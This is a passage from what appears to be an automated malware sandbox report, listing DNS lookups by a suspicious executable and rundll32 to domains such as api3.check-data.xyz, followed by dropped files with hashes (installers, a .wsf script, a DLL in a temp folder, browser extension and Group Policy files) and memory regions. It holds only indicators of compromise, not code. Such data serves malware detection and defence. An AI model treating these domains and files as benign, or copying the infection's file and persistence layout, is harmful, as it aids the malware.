                                                                                                                          80 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          service-domain.xyz

                                                                                                                          DNS Response

                                                                                                                          54.210.117.250

                                                                                                                        • 8.8.8.8:53
                                                                                                                          c.pki.goog
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          56 B
                                                                                                                          107 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          c.pki.goog

                                                                                                                          DNS Response

                                                                                                                          216.58.201.99

                                                                                                                        • 8.8.8.8:53
                                                                                                                          o.pki.goog
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          56 B
                                                                                                                          107 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          o.pki.goog

                                                                                                                          DNS Response

                                                                                                                          216.58.201.99

                                                                                                                        • 8.8.8.8:53
                                                                                                                          clients2.google.com
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          65 B
                                                                                                                          105 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          clients2.google.com

                                                                                                                          DNS Response

                                                                                                                          142.250.200.14

                                                                                                                        • 8.8.8.8:53
                                                                                                                          clients2.googleusercontent.com
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          76 B
                                                                                                                          121 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          clients2.googleusercontent.com

                                                                                                                          DNS Response

                                                                                                                          142.250.178.1

                                                                                                                        • 8.8.8.8:53
                                                                                                                          api3.check-data.xyz
                                                                                                                          dns
                                                                                                                          rundll32.exe
                                                                                                                          65 B
                                                                                                                          159 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          api3.check-data.xyz

                                                                                                                          DNS Response

                                                                                                                          44.240.96.128
                                                                                                                          44.237.52.63

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          ec8d642ef6bbc8f5076e447b9f7e0e4b

                                                                                                                          SHA1

                                                                                                                          9ae7a122c3329a7d4ff6297c80bac441e4e2a835

                                                                                                                          SHA256

                                                                                                                          7e4e6797111f818e3c890b5b3a3ba110b073590a2cef49f83a9f3699eb5ea8cd

                                                                                                                          SHA512

                                                                                                                          edba6af3f9f0eb338d5bf2842a0aa5e557dec22dddd54a72f6cdbb7edbe2b67bebf16acae6845bd2dcbfc86d91cf432310a901978bcb7b7b2d37f9b4adacf41c

                                                                                                                        • C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          9e0975ad6029911a3e725b516747f2cc

                                                                                                                          SHA1

                                                                                                                          72da298aaf7ccd52fc2aa4c30428635428439eec

                                                                                                                          SHA256

                                                                                                                          6b795ba6be75f7484af5515f6bf6f37162b1384be8e61e45c49404ae65bbaa92

                                                                                                                          SHA512

                                                                                                                          3810b7181955fb0db341042f30fd10ff9096ee2fb4ce80bda238f2d348fe47c3cee4edc9eb8320a25c1d2436c0f22f12fad29ffd023fd0c63b148b3bbb79ccdb

                                                                                                                        • C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          1e36eadb9fa0cd501d01182f7252bfc8

                                                                                                                          SHA1

                                                                                                                          d15dbb81b17cef98f88c94248ca54ba84ea89e07

                                                                                                                          SHA256

                                                                                                                          eff48282c5ead7e40f29efa79647732f7fc4c706d2ddb4a4328f339715659ee2

                                                                                                                          SHA512

                                                                                                                          8fb08bc6edb702e60ac8df47e70090918d8908d1943faf56ffb46591a9a95b4b166f53f38de794442ae588a449384dca7cfb7d6d4ccfd0400d8e0896db2a2b64

                                                                                                                        • C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          4d6bac0845b3cfd933de9524223df0e0

                                                                                                                          SHA1

                                                                                                                          4290ef99453e6163165e7483c0b1c7bf11448c4d

                                                                                                                          SHA256

                                                                                                                          1a89a3fa833bec51b28b0dd64f00edc511bdb2d6df8ec0318a9e4d1bbca987af

                                                                                                                          SHA512

                                                                                                                          a4fc0ee81da15c93ff1914b373b5f09ee8af0972ed8048f2483c2b107f543aa99dc357a0d432b01cbeb6ace0182a312e64f81f75410a03cbd193c900cbe0eeb9

                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                          Filesize

                                                                                                                          2.5MB

                                                                                                                          MD5

                                                                                                                          71a261ae47864aa3532236af7f8959cf

                                                                                                                          SHA1

                                                                                                                          719906f5ad873f1f7246de060e7287faf8f2c1a7

                                                                                                                          SHA256

                                                                                                                          fb4d99fde7d73bb07824aebb585f8f898d7206bcdf9236acc9ef4369dc8e438b

                                                                                                                          SHA512

                                                                                                                          183bd79ee88cb74321906f76ab547489811f3cdd416352b9f19de0a6bb5f8205d27005c6501c992c28e1189b4a81be4c67fbf4f2e897c825d0e636c6f9b645d3

                                                                                                                        • C:\ProgramData\hDwfgHvtnjxOxeVB\FFvMggw.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          9188454148621069418aa040e48f9b49

                                                                                                                          SHA1

                                                                                                                          b950947e07beec4d5b561235196652fd73b0f59d

                                                                                                                          SHA256

                                                                                                                          11c6e8a70e5f157373b7be8fae6f54a7ee8a2e7cf1116bee0e6597e82b46dfaf

                                                                                                                          SHA512

                                                                                                                          ba04752759fcff5faa546bdbc5f2451324fefae6db5dd458dd7e0fcc51aed45b177ea36d9fd48455ab611bb5f19d231ac52fb658eb7eece146bbffb059ac07c6

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                          Filesize

                                                                                                                          187B

                                                                                                                          MD5

                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                          SHA1

                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                          SHA256

                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                          SHA512

                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                          Filesize

                                                                                                                          136B

                                                                                                                          MD5

                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                          SHA1

                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                          SHA256

                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                          SHA512

                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                          Filesize

                                                                                                                          150B

                                                                                                                          MD5

                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                          SHA1

                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                          SHA256

                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                          SHA512

                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                          Filesize

                                                                                                                          10KB

                                                                                                                          MD5

                                                                                                                          862496cc66b72997f27cc4f161e757fe

                                                                                                                          SHA1

                                                                                                                          f93d0cec5880e8921708d05d643557e6bba77174

                                                                                                                          SHA256

                                                                                                                          54e1236b02afc30f0daa7aaa09e51b7f55d537d0e48aca05348c5c291fdde5cd

                                                                                                                          SHA512

                                                                                                                          80267b908440a1f3326104ea325f8eac24da0d1b3f6deee3159028cd572560df7aed955429a1dd39c67fd71cbddbabd4de607fb3ca74d217dea9360a42770947

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                          Filesize

                                                                                                                          28KB

                                                                                                                          MD5

                                                                                                                          90ef2f32488739dc6eda5d67c873f987

                                                                                                                          SHA1

                                                                                                                          cac7e334d0c9f30acd9e9c538ab6a6e46a3118dc

                                                                                                                          SHA256

                                                                                                                          20c34cc822e3d7945602e7e49d700375f9be6d8afd019ae9c6edeebfe257dda8

                                                                                                                          SHA512

                                                                                                                          7c877dbce7de0c34a88883059de86cd2104f805c2a8bc5aec41706855ad8add94de523e84733766055617f148dbd28fcb3c8c36f2e3f0f6e406e1d3658e4a718

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DFTOYRG8R5OOI32KOBV.temp

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          8b5be526d65e671aa26cf4cddca3e51a

                                                                                                                          SHA1

                                                                                                                          a4baf155d286549248eafbd1c5b9142871031f72

                                                                                                                          SHA256

                                                                                                                          20ef2d5dbd63c5961877ee708bd2209fee5ec8ee9d60df923b6130c5154d7f97

                                                                                                                          SHA512

                                                                                                                          b2fa529a06b0c17974bc0d5915dbb78b713f538ad3aa4c9e3c39f6546259866bae2be7768be91386c70c3a339c02546a74f305097f00c6a3d22fd58eb4b14e6f

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          438018fbeb7af13f6e27ccc0501f738a

                                                                                                                          SHA1

                                                                                                                          70c7531a0edcd53d4f1f9f7bbdc0155bbb7f8746

                                                                                                                          SHA256

                                                                                                                          572c3b352e061a266fcd4579e10205dc3d9dd6e9639a3c14f9593eaa7f08b7b1

                                                                                                                          SHA512

                                                                                                                          9c2a5984cbe343bacbf5d2c780c781f3f038abc505c6f2a7e76cde4b48ce914c3ca72505bb10c3d3eefa518eebbb58a5d3f4bbc38bf8ee18ff44dfcbbd7afeb2

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nndpnsl0.default-release\prefs.js

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          89e26a2b3bc7b497c5134d1737118133

                                                                                                                          SHA1

                                                                                                                          58a582e07448eafd2d7cd5161698fff8d5c9dbfa

                                                                                                                          SHA256

                                                                                                                          f8842efab886c4b9f90a86efa5e51357811bbc80022ea5357cb4a9ac61f16f41

                                                                                                                          SHA512

                                                                                                                          f90e04bb9083f2d108c2db41bec9e1da7cd48e25298b2e16bf60adb0acf09471de0419db4410b42d6de55da4a7c6931d25f500ff9fe7aea399f40bccd0b0c164

                                                                                                                        • C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf

                                                                                                                          Filesize

                                                                                                                          9KB

                                                                                                                          MD5

                                                                                                                          5ab82674f3357670f515825c91a927bc

                                                                                                                          SHA1

                                                                                                                          bc6eeb548d5623eb48fad56009f6eecc3f459525

                                                                                                                          SHA256

                                                                                                                          7eeb62ec2d0666c06b6f0b01ce153e5f5428d122a329b3c74ff5e9717e4fff15

                                                                                                                          SHA512

                                                                                                                          6b0ec8b9265226885a9b000024acbadac2f89585934f1006eea4efc969118dfde55f0a1dfc03b63a31651cdb6b91140c57daab32b295145463760511a92c4cb0

                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                          Filesize

                                                                                                                          5KB

                                                                                                                          MD5

                                                                                                                          7ac1c29e74a29826aa3958ace292e749

                                                                                                                          SHA1

                                                                                                                          113b6a237db1140203123728bbb9ede43314ac77

                                                                                                                          SHA256

                                                                                                                          153db52824e3389b65ccbe55d41d518d422e99347257d0fd7c9fa30c2d1623cd

                                                                                                                          SHA512

                                                                                                                          e66574d796e8939d09f814a293f8a7e213fc7015a2e4e5bcaed9004b624729833af9e626c643c971dbce98abed9fecc9c4676bac9104d6fae2f2cf842c8c54d9

                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zSCC35.tmp\Install.exe

                                                                                                                          Filesize

                                                                                                                          6.4MB

                                                                                                                          MD5

                                                                                                                          937a707de797e2cd82db6cb1e7bd8028

                                                                                                                          SHA1

                                                                                                                          0e0a041836fb513d4c3325d1cee07d60c72908ec

                                                                                                                          SHA256

                                                                                                                          8007a258a3ce141de8381da8d049886aed118feeb86bd0d358678a33116d42f3

                                                                                                                          SHA512

                                                                                                                          8a3361aa4a677f3435e0e4c66d45844bec6da9fad15113a51643df1eb110c6ef44f4c59b91f366f5c4e7cc900d01af71f1d002639ecd1a9caf848f07a2c6bab2

                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zSCDCA.tmp\Install.exe

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                          MD5

                                                                                                                          4a6234985179c24fab6e1ca0c926d8b7

                                                                                                                          SHA1

                                                                                                                          53e1858155418e1c0b163bfc796af17c20f9293d

                                                                                                                          SHA256

                                                                                                                          5d451382e517894f68583cd635aa094378c963c2fd67517d2d1466807da4e41e

                                                                                                                          SHA512

                                                                                                                          5916a7c4d9ed751cb7a494ab8b3444a59c635b2768bb2d395b8917b306cc07b66206d2ccf4b784ca4afdf0edce1b1f2c1ca6365d480cb42aaf40492770b3c6de

                                                                                                                        • \Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll

                                                                                                                          Filesize

                                                                                                                          6.5MB

                                                                                                                          MD5

                                                                                                                          0adf6200e5ae41efdcb874ef6c181c18

                                                                                                                          SHA1

                                                                                                                          3d65aeb9d1411f437aaa3a34218327a2d8503860

                                                                                                                          SHA256

                                                                                                                          25e86744bd0c1402446e21fe0729f19dfb3b865a6d0e4ce597f3d5793ef75ea1

                                                                                                                          SHA512

                                                                                                                          53efdd8cc69c145b38af00a5ceaa0a7b3f102966f95f967a879a71dd750aae86786c5a85e50111176bc363f57a6453aebe06a34df87a23730c1b1f76d9df7107

                                                                                                                        • memory/1144-43-0x0000000002240000-0x0000000002248000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1144-42-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/1812-22-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/1868-53-0x0000000001D80000-0x0000000001D88000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1868-52-0x000000001B770000-0x000000001BA52000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/2432-32-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/2664-118-0x00000000012B0000-0x0000000001310000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                        • memory/2664-85-0x0000000001150000-0x00000000011D5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          532KB

                                                                                                                        • memory/2664-315-0x0000000002C00000-0x0000000002CD8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          864KB

                                                                                                                        • memory/2664-305-0x0000000002F60000-0x0000000002FE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          544KB

                                                                                                                        • memory/2664-72-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/3000-318-0x00000000012C0000-0x000000000189D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        We care about your privacy.

                                                                                                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.